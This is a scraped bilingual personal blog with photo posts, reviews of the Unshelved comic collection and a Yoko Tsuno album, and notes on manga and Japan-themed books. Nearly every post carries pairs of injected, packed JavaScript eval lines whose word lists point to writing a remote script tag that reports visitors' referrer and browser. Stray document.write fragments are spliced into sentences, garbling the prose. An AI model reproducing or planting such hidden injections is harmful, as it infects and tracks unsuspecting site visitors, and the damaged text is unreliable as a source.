Supermoon

Rare éclipse de super lune / Rare eclipse of supermoon
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ikrtd|var|u0026u|referrer|aikhh||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nzdik|var|u0026u|referrer|yfhhr||js|php’.split(‘|’),0,{}))
Supermoon 1
(iPhone 6, document.write(“”); 2015-09-27)
Supermoon 2
(iPhone 6, Camera+ app, 2015-09-27)

Image du chat-medi

Surveillance féline / Cats keeping watch
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|itihz|var|u0026u|referrer|knbdh||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|irsrn|var|u0026u|referrer|zbnna||js|php’.split(‘|’),0,{}))
Keeping watch
(iPhone 6 / 2015-09-20)

Image du mer-fleurie

Quelques fleurs des champs pour égailler le milieu de la semaine
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hbdyt|var|u0026u|referrer|fitey||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rtrrh|var|u0026u|referrer|hbber||js|php’.split(‘|’),0,{}))
Some
field flowers to enlighten this mid-week
Field flowers
(iPhone 6, document.write(“”); 2015-09-19)

Unshelved 11: Reads well with others

“Our very first full-color collection, document.write(“”); Reads Well With Others features stirring tales of library derring-do, often inspired by, and occasionally blatantly documenting, true stories from librarians around the world. In this volume you’ll find strips about: unattended children, creeps, staff trainings, website redesigns, reading levels, confidentiality, bookstores, coffee… and much more, including Conference Tips never seen on our site.”
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yskzd|var|u0026u|referrer|bhkny||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibnhi|var|u0026u|referrer|ztbef||js|php’.split(‘|’),0,{}))

“It’s the same compact size as our last three collections, but this time around every strip is in full color!”

[ Text from the publisher’s website; the back cover is also a must-read ]

“Libraries provide access to information, entertainment, and the Internet. They are the backbone of democracy, sacred places where anyone can find answers to their questions. Unfortunately, people who come there for help behave just as badly they do everywhere else.”

In January Overdue Media released the eleventh compilation of the Unshelved web comics that chronicles the daily misadventures of Dewey and his co-workers at an American dysfunctional library. Reads well with others compiles the comics strips originally published on the website between April 1st 2013 and September 25th 2014, as well as the “Conference Tips” originally published in ALA CogNotes newspapers in June 2014, January 2014 and June 2014.

The Unshelved web comics is very dear to my heart despite the very average quality of the drawings (although it’s probably quite good for a web comics). The reason for that is quite simple: I work in a library myself and I can recognize in those strips situations I’ve found myself in so many times. Believe me, it’s much better to choose to laugh about it than go insane!

The quality of the strips is improving with each new volume, but unfortunately the novelty of the concept wear off so it’s not uproarious anymore. However it’s still quite funny and entertaining to read (maybe less if you don’t know well the library domain). Again, like the last couple of books, I deplore that they haven’t included the “Unshelved Book Club” pages, but at least now the book is 120 pages in full color. You can choose to read the comics for free online, but personally I prefer the convenience of having a real book in my hands (and it offers encouragements to the creators). This should be a mandatory reading for all library staff!

My top ten favourites strips for this volume: 2013-05-13, 2013-05-14, 2013-07-25, 2013-10-01, 2013-11-18, 2013-12-11, 2014-01-22, 2014-03-10, 2014-09-16, and…

2013-09-02

Unshelved Vol. 11: Reads well with others, by Gene Ambaum and Bill Barnes. Seattle, Overdue Media, January 2015. 22.5 x 17 x 1 cm, 120 pgs., $11.95 US / $15.95 CDN. ISBN-13: 978-1-937914-06-6. For readers of all ages.

For more information you can check the following websites:

You can also read my comments on the previous books:

Reads well with others © 2015 Overdue Media LLC. All rights reserved.

[ Traduire ]

Image du chat-medi

Mes adorables chats: Caramel et Saya
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hadsi|var|u0026u|referrer|zzfft||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eyhnz|var|u0026u|referrer|iynkh||js|php’.split(‘|’),0,{}))
My adorable cats
(iPhone 6, document.write(“”); 2015-09-13)

Les découvertes du mois

En août et en septembre j’ai fait la découverte (par hasard ou parce qu’on me les a recommandé) de quelques livres intéressants qui se sont, document.write(“”); bien sûr, ajouté à cette liste de lecture qui ne cesse de croître. Il s’agit d’ouvrages très diversifiés, dont certains en anglais, que je vous présente sans aucun ordre particulier dans l’espoir qu’ils vous intéresseront également.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ytezd|var|u0026u|referrer|snabr||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bsdbk|var|u0026u|referrer|eftbf||js|php’.split(‘|’),0,{}))

Voir les détails
après le saut de page >>

Ad Astra

“Sicile, 241 avant J.-C. Après deux décennies de conflit avec Rome, l’armée carthaginoise menée par Hamilcar Barca doit déposer les armes. Son fils, Hannibal, a six ans quand il assiste à cette bataille. Mise en déroute, Carthage doit un tribut astronomique au vainqueur, et l’enfant est témoin, impuissant, de l’humiliation des siens.”

“Mais le jeune Hannibal refuse l’échec : élevé dans la haine de Rome, il va vouer son existence entière à la destruction de l’ennemi. Commence alors l’affrontement exceptionnel d’un des plus grands tacticiens de tous les temps et de son alter ego romain, le génie militaire Scipion l’Africain. Traversée des Alpes à dos d’éléphant, pillages impitoyables et combats parmi les plus sanglants de mémoire d’homme : un duel à mort qui a marqué l’Histoire…”

“Bravoure, complots et stratégie… Plongez au cœur des batailles qui opposèrent les légendaires Hannibal et Scipion !”

Je ne peux pas croire qu’un manga mettant en scène l’histoire de Rome m’ait échappé! Et c’est dans un style très décent! Il s’agit d’un manga seinen historique couramment prépublié dans le magazine Ultra Jump de Shueisha depuis mars 2011. On y raconte la deuxième guerre punique alors que l’expansion naissante de Rome l’opposait à l’empire Carthaginois au IIIe siècle avant notre ère. Il y a sept tomes de paru jusqu’à maintenant. Une bande-annonce et un extrait de cinquante-neuf pages sont disponible sur le site de Ki-oon. À lire absolument dès que j’ai un peu de temps!

Ad Astra : Scipion L’Africain & Hannibal Baca, Tome 1, par Mihachi KAGANO. Paris, Éditions Ki-oon, mars 2014. 13 x 18 cm, 226 pg., 7,90 € / $14.95 Can. Sens de lecture original japonais. ISBN: 978-2-35592-652-5. Recommandé pour public adolescent (14+).

Pour plus d’information vous pouvez consulter les sites suivants:

Godzilla: une métaphore du japon d’après-guerre

“Le kaiju eiga (film de monstres) continue encore aujourd’hui à offrir aux théoriciens un indicateur intéressant de l’évolution de la société japonaise depuis 1954, année de sortie du premier Godzilla. Le Japon d’après-guerre demeure sans nul doute un lieu de prédilection qui se prête à l’incarnation de plusieurs périls enfantés par l’inconscience des hommes. Godzilla et ses avatars, par leurs ravages cataclysmiques, perpétuent cette image d’une nation victime des forces de la nature ou des dérives génocidaires de la science.”

Un sujet qui me semble passionnant, abordé ici par un auteur québécois dans un essai publié en France. J’ai toujours dit que le cinéma est une fenêtre ouverte sur la société et le temps et qu’il peut nous en apprendre beaucoup si seulement on peut prendre quelques instant pour l’observer et y réfléchir. C’est particulièrement vrai pour le cinéma japonais. Vous pouvez voir la couverture arrière pour plus de détails, ainsi qu’un extrait sur Google Books.

Godzillamd: une métaphore du japon d’après-guerre, par Alain Vézina. Paris, l’Harmattan, mai 2014. 21.5 x 0.8 x 13.5 cm, 198 pg., 24 € / $40.95 Can. ISBN: 978-2-343-03201-6. Recommandé pour public adulte (16+).

Pour plus d’information vous pouvez consulter les sites suivants:

Planète japon

“Planète Japon est un magazine francophone trimestriel, entièrement dédié à la culture japonaise. On y trouve des dossiers (sur l’histoire, la culture, la société japonaise, les arts et même les paysages japonais), des articles de qualités (musique, littérature, mangas, cinéma, cuisine, technologie, tendances, etc.) mais aussi des interview. Distribué partout en France ainsi que dans certains pays francophones, Planète Japon propose un voyage entre modernisme et traditions à tous les passionnés de Japon, quel que soit leur âge et leur connaissance du pays.”

On me dit que c’est disponible en kiosques ici mais jusqu’à maintenant j’en ai fait une demi-douzaine sans la moindre chance. Pour plus de détails voyez leur site internet ou la page Facebook.

La Divine Comédie par Go Nagai

J’ai été plutôt intrigué lorsque Animeland m’a appris que les éditions Black Box (dont j’ignorais l’existence: voir leur site internet et page Facebook) allait publier fin septembre une adaptation très personnelle (et qui semble très “inspirée” de Gustave Doré—pour ne pas dire copié) de la Divine Comédie de Dante dans le cadre de leur Collection Go Nagai (3 tomes de 258 pages, 14,5 x 21 cm, 32.70 €). Cela n’a rien de récent puisque Dante shinkyoku (?????) a originalement été publié au Japon en 1994.

Je n’aime pas du tout Go Nagai: je trouve son dessin laid, ses histoires vulgaires et il a la fâcheuse tendance à usurper le travail de ses assistants sous son propre nom. J’imagine assez bien cependant une adaptation de Dante par cet auteur fasciné par l’horreur démoniaque. Je serais donc curieux de voir ce que cela donne comme résultat (en fait, nul besoin d’attendre que cette série traverse l’Atlantique puisqu’il existe déjà une “scanlation” anglaise partielle). À voir donc, mais par simple curiosité.

The Firefly Effect: Electoral 2072 – Book 1

I have this friend from college who seems to be a real renaissance man: he’s an athlete, an artist (he drew a wicked Calvin on my dorm’s door and inked the comic I scripted, Gates of Pandragon), an engineer, and a lawyer. I knew he was creative (he wrote some RPG scenarii) but I recently discovered that he also wrote a couple of science-fiction novels! Some would say they are not real books because they are not in print, but ebooks are the future and the publishing company is an open access publisher specialized in Science, Technology and Medicine! It looks quite serious (but actually they’re based in India and have a questionable record; it’s more like self-publishing as you pay them to publish your stuff). He told me that he writes hard-science and implied that it might be a difficult read since he writes for himself, assuming that his readers have a PhD in Physics! Comments are good, though, and it looks interesting so I will surely give it a try as soon as I have a little time.

The Firefly Effect: Electoral 2072 – Book 1, by Alain Villeneuve. Austin Publishing, June 2014. 278 pg., $3.39 (Kindle edition). ASIN B00L0T49WA. The second book is titled The Oldest: Electoral 2072.

For more information you can check the following websites:

A Brief History of Manga

“Manga is more than a genre in the comics field: it is a vital creative medium in its own right, with hundreds of millions of readers worldwide, a host of graphic styles, and a rich history now spanning seven decades.”

“Now for the first time, that history is told by an award-winning expert in the field. Covering topics from Akira to Mazinger Z, this book is fully illustrated throughout, and photos of key creators accompany accessible sidebars and timelines.”

“Answering the key questions of any fan where did my favourite manga come from, and what should I read next? this book will open doors to neophytes and experts alike.”

There sure has been an avalanche of reference books about manga lately, but I always said that there is never too much information. Each new books offer a new angle, a new perspective. And this time it’s written by Helen McCarthy, a well-known anime and manga specialist from the United Kingdom. I am quite curious to read it and add it to my reference shelf. I’ll try to get a review copy from the publisher (if I can reach them, their website was down for a while).

A Brief History of Manga: The essential pocket guide to the Japanese pop culture phenomenon, by Helen McCarthy. London: Ilex Press, July 2014. 18.5 x 11.5 cm, 96 pg., £7.99 / $14.99 Cnd. ISBN:978-1-78157-098-2.

For more information you can check the following websites:

Histoire(s) du manga moderne

“1952. Le manga moderne fait ses premiers pas dans un Japon qui retrouve son indépendance après la Seconde Guerre mondiale. 2012. Phénomène culturel global, le manga est un rouage essentiel de la troisième puissance économique au monde. Comment, en soixante ans, la BD japonaise a-t-elle connu un tel essor ? Qui sont les acteurs ayant permis cette incroyable expansion ? Année après année, découvrez les événements majeurs et les artistes qui ont marqué l’histoire du manga moderne.”

J’ai introduit ce titre il y plus d’un an déjà mais, là il est finalement paru alors j’aimerais encore une fois en souligner l’importance avant d’en faire un commentaire plus approfondi. C’est un bel ouvrage avec une présentation chronologique fort intéressante. Et comme je l’ai dit plus haut, on a jamais trop de références sur le manga, chaque nouveau livre apportant une nouvelle perspective.

Histoire(s) du manga moderne , par Matthieu Pinon et Laurent Lefebvre. Paris: YNNIS Éditions, Avril 2015. 24 x 2.5 x 27 cm, 204 pg., 29.99 € / $49.95 Can. ISBN: 979-1-0933-7622-6.

Pour plus d’information vous pouvez consulter les sites suivants:


[ Translate ]

Yoko Tsuno 27 – Le secret de Khâny

“La nuit est tombée sur Loch Castle Cottage et ses habitants. Mais tous ne dorment pas… Yoko et Émilia sont dehors au moment où un étrange engin volant les survole et, document.write(“”); d’un rayon fulgurant, frappe Yoko à la tête. Dans un réflexe de survie, Émilia désintègre l’engin qui explose et s’écrase dans le Loch.”
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zdrzb|var|u0026u|referrer|aezad||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hztyt|var|u0026u|referrer|ihddk||js|php’.split(‘|’),0,{}))

“Peu de temps après, Khâny apparaît dans son vaisseau spatial et explique à Yoko que l’engin l’a prise pour elle, à cause de l’alignement de leurs ondes de pensée. Elle lui révèle une info étonnante : chargée de veiller sur les Vinéens qui dorment en léthargie sous la terre et d’assurer leur retour sur Vinéa, Khâny a découvert parmi eux une adolescente à qui on a insufflé des connaissances très particulières, à savoir un programme de “purification” capable d’éliminer microbes et bactéries de la surface de la Terre pour permettre aux Vinéens de s’y installer sans danger. Ce programme, sinistre héritage de l’infâme Karpan, aurait donc le pouvoir d’éliminer toute vie terrestre ! Plus grave encore : l’adolescente a réussi à fuir son caisson pour se réfugier sur Mars où un accélérateur-lanceur pointé sur la Terre pourrait réaliser, à titre posthume, l’horrible dessein de Karpan.”

“Pour aider son amie vinéenne, Yoko va prendre tous les risques et se lancer dans cette aventure sans se douter que Khâny lui cache un autre secret…”

[Texte du site de l’éditeur; voir aussi la couverture arrière]

ATTENTION: Peut contenir des traces de “divulgâcheurs”! Les personnes allergiques à toutes discussions d’une intrigue avant d’en avoir eux-même prit connaissance sont vivement conseillé de prendre les précautions nécessaires pour leur sécurité et devraient éviter de lire plus loin.

Continuez après le saut de page >>

Dans ma jeunesse, mon imaginaire a surtout été nourri par les personnages de bandes-dessinées que je retrouvais dans le journal Tintin et dans le magazine Pilote auxquels ma famille était abonné. J’aimais particulièrement, pour Tintin, Alix, Corto Maltese, Cubitus, Dan Cooper, Luc Orient, Martin Milan, Olivier Rameau, Ric Hochet, Taka Takata, Tintin (évidemment), et Michel Vaillant. Dans le cas de Pilote, je lisais surtout les aventures de Achille Talon, Astérix, Bob Morane, Iznogoud, Lone Sloane (Druillet!), Philémon, Lucky Luke, le Vagabond des Limbes, mais mes favorits étaient sans aucun doute Le Génie des alpages, Valérian ainsi que toutes les histoires de Enki Bilal. Plus tard, j’ai aussi été un grand adepte de Métal Hurlant (où s’exprimait le talent inouï de nombreux artistes comme Druillet, Moebius, Caza, Bilal).

Toutefois, il y un des grands magazines de BD que je n’ai jamais vraiment lu: Spirou — je ne sais trop pourquoi; probablement parce que, par le temps que je le découvre, je trouvais le genre d’histoires qu’il publiait un peu trop enfantin pour moi. Cela ne m’a pas empêché de lire en albums plusieurs de ses séries (comme ceux des Schtroumpfs) dont ma favorite est sans conteste Yoko Tsuno. Elle a su satisfaire ma soif de science-fiction et a sans doute été mon premier contact avec la beauté de l’orient.

La tranquilité de Yoko, qui se repose en Écosse entouré de ses souvenirs de voyages (quelques compagnons de fortune et plusieurs “créatures” étranges), est troublée par l’apparition hostile d’un vaisseau Vinéen. Sitôt le vaisseau détruit, Yoko reçoit la visite de Khâny, son amie Vinéenne, dont la mission est de veiller sur les envahisseurs Vinéens qui dorment en léthargie sous la terre et d’assurer leur retour éventuel sur leur planète d’origine. Parmi eux dormait une adolescente conditionnée à l’extrême pour contrôler un programme visant à détruire les microbes et bactéries de la Terre pour permettre aux Vinéens d’y vivre sans dangers… et ainsi éliminer toute vie sur Terre! Celle-ci s’est cependant échappé vers une base sur Mars, où elle peut activer un canon géant qui tirerait des projectiles destructeurs vers la Terre. Yoko et Khâny doivent donc se rendre sur Mars pour l’en empêcher.

Après quelques retournement tarabiscotés, Yoko découvre que Khâny a menti: la véritable mission est de sauver l’adolescente, nommée Tévy, qui est en fait une hybride biocompatible humaine et Vinéenne. Évidemment, Yoko réussi à échapper aux griffes de Gorka (le fidèle second de l’infâme et belliqueux Karpan), à détruire l’arme mortelle et même à sauver Tévy, qui s’ajoute ainsi à sa collection de réfugiés-souvenirs. [baillement]


Comme toujours Leloup nous offre, avec Le secret de Khâny, de très beau dessins, très détaillés, avec des concepts technologiques qui semblent relativement crédibles. Toutefois l’histoire est un peu trop compliquée (on se perd un peu dans tout les mensonges de Khâny! C’est pas toujours très clair). Le rythme du récit est un peu lent au début et la fin est un peu précipitée (comme si l’auteur se sentait un peu à l’étroit dans son format de 48 pages). Si cela me fait plaisir de revoir ce charmant personnage après plusieurs années d’absence, je trouve tout de même que c’est un album un peu décevant. Il me semble qu’ils étaient plus excitant à lire que ça avant (mais c’est peu être juste moi qui vieillit)… C’est néanmoins une lecture incontournable pour tout les fans invétérés de la charmante électronicienne nippone.

Yoko Tsuno 27: Le secret de Khâny, scénario et dessin: Roger Leloup (mise en couleur par Studio Léonardo). Paris: Dupuis, juillet 2015. 48 pgs, 21.8 x 0.8 x 30 cm, 10.60 € / $17.95 Can, ISBN: 978-2-8001-6339-0. Recommandé pour public jeune (7+). Un extrait peut être consulté sur le site de l’éditeur.

Pour plus d’information vous pouvez aussi consulter les sites suivants:

Le secret de Khâny © Dupuis, 2015.

[ Translate ]